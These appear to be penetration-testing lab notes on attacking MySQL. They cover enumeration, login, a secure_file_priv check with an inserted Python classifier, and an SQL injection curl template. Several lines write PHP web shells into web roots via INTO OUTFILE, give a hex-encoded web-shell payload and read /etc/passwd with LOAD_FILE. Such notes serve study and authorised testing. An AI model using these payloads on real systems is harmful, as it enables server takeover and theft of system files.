[3306] MySQL

Default configuration file: /etc/mysql/mysql.conf.d/mysqld.cnf

Tool: DBeaver (GUI)

To install DBeaver from a Debian package, download the release .deb from https://github.com/dbeaver/dbeaver/releases and run the following commands:

Intrusionz3r0X@htb[/htb]$ sudo dpkg -i dbeaver-<version>.deb

Intrusionz3r0X@htb[/htb]$ dbeaver &

https://www.youtube.com/watch?v=PeuWmz8S6G8

MySQL default system schemas/databases:

  • mysql - the system database containing the tables that store information required by the MySQL server

  • information_schema - provides access to database metadata

  • performance_schema - monitors MySQL Server execution at a low level

  • sys - a set of objects that helps DBAs and developers interpret data collected by the Performance Schema

#Enumerate MySQL
Intrusionz3r0X@htb[/htb]$ sudo nmap 10.129.14.128 -sV -sC -p3306 --script mysql*

#Interaction with the MySQL Server
Intrusionz3r0X@htb[/htb]$ mysql -u root -pP4SSw0rd -h 10.129.14.128
C:\htb> mysql.exe -u username -pPassword123 -h 10.129.20.13

#Check how secure_file_priv is set (three possible states)
## If empty, the variable has no effect, which is not a secure setting.
## If set to the name of a directory, the server limits import and export operations to work only with files in that directory. The directory must exist; the server does not create it.
## If set to NULL, the server disables import and export operations.
mysql> show variables like "secure_file_priv";
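An added example (not part of these notes) that maps the three secure_file_priv states listed above to a verdict, reading the value either from a [mysqld] option file such as mysqld.cnf or from the SHOW VARIABLES table output; the option-file text and client output inside the script are constructed samples.

```python
"""Classify secure_file_priv, the variable the notes check with SHOW VARIABLES.
Added example for these notes, not the page's own code; all samples are constructed."""
import configparser
from typing import Optional
# Constructed [mysqld] section (the notes' Debian path is
# /etc/mysql/mysql.conf.d/mysqld.cnf; this text is not that real file).
SAMPLE_CNF = """
[mysqld]
user             = mysql
secure-file-priv = ""
"""
# Constructed output of: mysql> show variables like "secure_file_priv";
SAMPLE_SHOW_VARIABLES = """\
+------------------+-----------------------+
| Variable_name    | Value                 |
+------------------+-----------------------+
| secure_file_priv | /var/lib/mysql-files/ |
+------------------+-----------------------+
"""
def classify(value: Optional[str]) -> str:
    """None = option absent, so the compiled-in default applies and only
    SHOW VARIABLES on the running server reveals the effective state."""
    if value is None:
        return "default"
    if value.strip().upper() == "NULL":
        return "disabled"      # import/export operations disabled
    if value.strip() == "":
        return "unrestricted"  # LOAD_FILE / INTO OUTFILE may use any path
    return "restricted"        # limited to the named directory

def from_option_file(text: str) -> str:
    """MySQL treats '-' and '_' in option names as equivalent and quotes
    around values as optional; '!include' directives are skipped."""
    lines = [l for l in text.splitlines() if not l.lstrip().startswith("!")]
    parser = configparser.ConfigParser(allow_no_value=True, interpolation=None)
    parser.read_string("\n".join(lines))
    if not parser.has_section("mysqld"):
        return classify(None)
    raw = {k.replace("-", "_"): v for k, v in parser["mysqld"].items()}.get("secure_file_priv")
    return classify(None if raw is None else raw.strip('"').strip("'"))

def from_show_variables(output: str) -> str:
    """An empty Value cell is the unrestricted state; literal NULL is disabled."""
    for line in output.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) == 2 and cells[0] == "secure_file_priv":
            return classify(cells[1])
    return classify(None)
```

Run `from_option_file(SAMPLE_CNF)` to get "unrestricted" for the constructed config and `from_show_variables(SAMPLE_SHOW_VARIABLES)` to get "restricted" for the constructed client output.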

#Write local files
mysql> SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';
mysql> SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE 'C:\\xampp\\htdocs\\backdoor.php';

#Hex encoding of the string <?php system($_GET['cmd']); ?>
0x3c3f7068702073797374656d28245f4745545b27636d64275d293b203f3e

#Read local files
mysql> select LOAD_FILE("/etc/passwd");

| Command | Description |
|---|---|
| mysql -u <user> -p<password> -h <IP address> | Connect to the MySQL server. There should not be a space between the '-p' flag and the password. |
| show databases; | Show all databases. |
| use <database>; | Select one of the existing databases. |
| show tables; | Show all available tables in the selected database. |
| show columns from <table>; | Show all columns in the selected database. |
| select * from <table>; | Show everything in the desired table. |
| select * from <table> where <column> = "<string>"; | Search for the needed string in the desired table. |

curl -s -G "http://83.136.254.158:51914/search.php" --data-urlencode "port_code=<INJECTION-HERE>" | html2text
